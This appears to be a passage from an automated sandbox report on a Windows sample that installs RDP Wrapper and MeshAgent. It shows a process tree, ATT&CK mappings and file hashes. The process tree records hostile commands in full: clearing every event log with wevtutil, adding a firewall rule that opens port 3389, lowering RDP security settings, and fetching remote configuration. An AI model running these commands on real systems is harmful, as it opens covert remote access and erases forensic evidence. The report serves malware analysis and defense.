C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"5⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul4⤵PID:4936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"5⤵PID:4052
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.4474" /f4⤵PID:1076
-
-
C:\Windows\system32\findstr.exefindstr /c:"[10.0.19041.4474]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4560
-
-
C:\Windows\system32\PING.EXEping -n 1 google.com4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4668
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"4⤵PID:2608
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"5⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
PID:2176
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2016 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:816
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3360 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4408
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f4⤵PID:1980
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f4⤵PID:2204
-
-
C:\Windows\system32\findstr.exefindstr /c:"[10.0.19041.4474]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"4⤵PID:2292
-
-
C:\Windows\system32\PING.EXEping -n 1 google.com4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"4⤵PID:1620
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"5⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
PID:2180
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:388 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4736
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:748 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2916
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f4⤵PID:640
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f4⤵PID:1440
-
-
C:\Windows\system32\findstr.exefindstr /c:"[10.0.19041.4474]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"4⤵PID:1976
-
-
-
-
C:\Windows\system32\cmd.execmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""2⤵PID:4004
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3276
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4496
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1996
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:936
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3856
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3212
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4192 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1992
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4272
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4992
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3280
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4364
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4072 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1988
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:1140
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1360
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4840
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:3820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:4460
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1240 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1736
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:4956
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:3980
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4252
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:1008
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:1424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:560
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4148 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1996
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:4028
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:2392
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:2576
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:748
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:1188
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1180 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:3252
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:4584
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:3668
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:1532
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:4960
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:4940
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4696 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:2700
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:2564
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:3220
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:2088
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:4372
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:928
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2940 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:3980
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:4024
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4376
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4300
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:2800
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:5028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:3140
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4052 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4564
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:2416
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:4776
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:4844
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:2628
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1464 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:412
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:2840
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4980
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:2424
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:2360
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1852 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1096
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:1804
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:3304
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:2984
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1052
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:4272
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2080 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1104
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:3896
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4040
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:3928
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:4020
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4148 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:1512
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:2600
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:4356
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
3Hidden Files and Directories
2Hidden Users
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153KB
MD5479f7a0e8d3c4a168fc2dcc6b7b40f1f
SHA11f3e221ce809c771b4aea046cb0d4798cb1f4d79
SHA2564026b5f76af2465d27a9d4a7d1014b6ab999bc9902830f39fdbea87ee799c6fd
SHA512983d4fe70ddad6b7c4825c7d0c4ef1f24f8b9cdce6a9ff9aba9d7b9b4259fcf91e8b76626e079fcee8f23f8c29a59426e8df609cc60ef7fd77a542e5170ffa47
-
Filesize
389KB
MD5383e73ce167c5137841cdddf83c022c4
SHA19f4bd5369ac3e137dd26bd0bf45e0e18a149cb4a
SHA25628c2f5d57d7a5f7161fbcaa6b10466c4114bebec363963c227a50e4187c6c209
SHA512f2261c183fb312d1806cb18a768e181514f455339316a21a24430d8acc2e7618ff3e9b248081fa5356a6ec0ede9a78b3369bd3cc69be7840492ea965330dcffd
-
Filesize
3.7MB
MD59065d79fe0436283f3957106d9c53700
SHA19edef111e8ce820573c5ea8b22939ad9e105b9b7
SHA25694fe946df0fdde2138394d7ec4437b7030600d3139ed7b96602466d4ba3c7535
SHA5124957784f6054fe73b4960fb89d5ce384bdaa7c8e2faee4f2cb7ff80fdf1f45370b450709be4671c3fbe7dab432f3447a03e568f4d31401d5542a2084667a5219
-
Filesize
334B
MD59623da3ac60a4a87705c50f91a406341
SHA1d859949e4e12989516d860779317dfa2efa24d17
SHA256f8173bb7397c2c281cc7fded817db334359eae3530f0aa4742039f89268ea41d
SHA5121810bbf1ee9fd56b21a4d500b46b546bceef07926b6acce516c4e1d4d86145ab4db7e9cc274b219bb44d226485ab77c2f1f3a9008ecc157e13595d61bd5bd774
-
Filesize
501B
MD548ec757b3d37543068b5e28a0942b984
SHA168688ebef3a9bcf0395571b9e482c4be8fd9c44d
SHA256270d5e8a5e4b6dcc5871aa8f0e91da22a314bc662fe64440c4e799cf40ccece4
SHA51231a2350c9a1b10a54e7cff3907997e3766275e9dd3494120117b8b69f7cf7972071827fcd3a8a70934a76e64470acb3f8c1a7ccafd011fe855742066a96e70b5
-
Filesize
668B
MD5d162b3493ea04dea1188192391ef4acf
SHA14628426df13527783b6f7785fa72eb10c214f41e
SHA256780da6e822660566edf5cdda457d6e27c8b1685bed45854c51c6a9e3c0181304
SHA5126f30d7aa51c75612a591e9c608c94f6798d65b41de58cab5ef8cbbe8373bf4e6fcf59f7ba6938aa2c9d2175e989c717c4bed59a5d4bff47e9e1d1c34ca839885
-
Filesize
835B
MD5d87da0aa8a430143448815b368714b5b
SHA14fbbc8b0f2698c562d961cf2c8934cbb8dcd893e
SHA25691308d0d5fd137bb1f07abdbcbd26019d72d9d08b9a33682aba64a478ea0a69f
SHA512c6339a3808309d3ee19fa3e0e6a771f1d37fd0d864aacf1f9cbd8ce866ddb497bbc67ddadf3b4e8909a581309129031367244f07764b383c572d31ee4b037b1c
-
Filesize
31KB
MD5a45919647f6420ecb4eca54b1172c5c8
SHA1df5b0de8365711865fe5f47cb301afbd9b25596d
SHA25683133ec01c7d4167449ea120aa96d1d3bbb8a585de145f56f42d13fd7c35b6f7
SHA512cf081410989b91b2285133cd6d787cfb6ab0432ac66737950f2484326777f3fc520ac587ab291ca48dca6a83fa941efe174b3a14f77d9ae6f590d0ae48c9001e
-
Filesize
5KB
MD50f02cb50631bc2ed707c482e337d7e26
SHA12d0191aea9270bdbd0c3af861e7c9873435d86a3
SHA256b2caa22649d7c11bc3ab529ee5bad16eee6e933e4c1a19ae4c3d299bfd7abf7b
SHA5127b7e33424c02a7751f92e9bd7ea9f4f883823b5ddcb466031d8b8dc3fdd6b6cc1213a261d926a93cff54aac318b9b5c20dff17a7a701c15d78cd606d96bd52b9
-
Filesize
129KB
MD54ff0e05ee0b81a1e8c65775cbb939d97
SHA1198f4a5d7aaf89e24d0ca4fbe4805aa2a30122fd
SHA2567ea3029690494db514eb88a21ec922a7fc30595aeb3ab6ceffb23c47b35c5911
SHA5120a95439ca4ceae7c0c57c230e08ed396bd2b5ee199da70f2b5509d3ea572f922f5af1c55ed2f30ab2c6d2abf7b34763f76d252660c58efa9933aa4bb5c9d7133
-
Filesize
130KB
MD5e3b29a60edbbe09d6cc75f8793432a3d
SHA172932a473600e2194f8bfde29265df70e127845d
SHA2569668bd0398b543100a1389d68a90ea53b1479be79f698c9bd870773d05cb1579
SHA512ecf7cb83c3c181c1b0e23ded6052f596b31635a901a9bf47be38a23748e76b94adb424d2bf8c07d4d35f8ef0b07cbf5394af7b9cb53d0da73195ccbb65550350
-
Filesize
131KB
MD536f2f304ea7905b4d47e2f45af1e2940
SHA17a3040d6cfd5f58d7c3526869d411adf1ee23e62
SHA2565c17f5caae732ebb37dcff4e5f148178a82a680def3b51cb882642a63703b019
SHA5121c686dc0c19a4226e75322ad18e0e728d765c6df085bbe90acc2f285e683621f833a626590e2efc97d42cbc43a4984fe728915aea6566a0ac58ca540415f9229
-
Filesize
132KB
MD5d3c90f02de548c8dea592f6d2a0e3feb
SHA13c70944d08059e1fd4be347c8a56dddf41a63f16
SHA256c0055252f5a1e8f3d9750cebdefee565b160b572ac6977917c78bd5452802ebb
SHA5126a0164d5780f1af9582fb2a328c3134f5cba4c50b905d5c9216ea22eb3f5475846599c0e98e1a9d98bf5002ecd1c6975087ef85089b1823482ca15ee20ad89ec
-
Filesize
133KB
MD5959c3ce8acb8c1089ef0cb041a0eb5c9
SHA1e7d41246ce112345e6d8918b02159c50e173148a
SHA2561d882f6f153c6eb3325c07a0fc8b25a5dbaffe343cd2c559f1458bfdd74c12b3
SHA512e1dae3f35c96ff1b0dc61e30e10784c09f346e3015dfeea84197841cfac8f4a1e8e95c96a598fbff0f010be1bbb32efb79384347b7dc9ea7e199cfc4e2f1dfc7
-
Filesize
134KB
MD51d10fc6e824198a43a9c3cedaf3eadcb
SHA178693d1b156df401197a7d8a3ecf41684afcb7dd
SHA256518db8405c5fd5910255f82e582871a3e6c59103e2b7b4c8f35575f5d21cd22c
SHA51281f594875e137eb19fd31dc479303e9a61072ab5044ae8bcfdaa9c455a859f7e8a77d93d83eec2091c045cbef750c7e9aabf190059ef3153a9cbacf3b99f24f8
-
Filesize
136KB
MD57437ff9227834958cd8d13afc91f8856
SHA101f598ed3cbddc56e9d619099e86e0cc0368577e
SHA256c2d66e92a232aa51d6a208d4fed96806effc9020ca71a33103e05f388edb6b43
SHA512be7b0cf9095a078d4dbd08a78b4e0feae5316bdb76adfdc900abcba7ca80e82294f9993eaf2a866e7ed2affb8e81ee070b7f19cced30249f9af59d82d084f0e7
-
Filesize
13KB
MD5e3776087adc7bd1c1eefd535ef7a70d9
SHA151272e24aa2d913ed8f7e46c1a15bdb900803ce4
SHA256da49baeb183185509fccf55b8414e5286ab4575952e43f8306d049b601854d2d
SHA51259f231e4f6f0fe3f051284ebfd6d447e9bfe15c4e0f465bc98f6595ca7fae4d82dce2876a2e67275da8f845e94d6d875d25325575bab71ff2b662c38b62ce4b5
-
Filesize
648B
MD5cb375c192eb771244de592f37489f13c
SHA14e2b5cf74d92e7ed7e37f3cda66752ae03ff9215
SHA25687cc27787aaa38a34f0e607d3453ac47f78cc607a91e27e354fd7bbbcc4b0f86
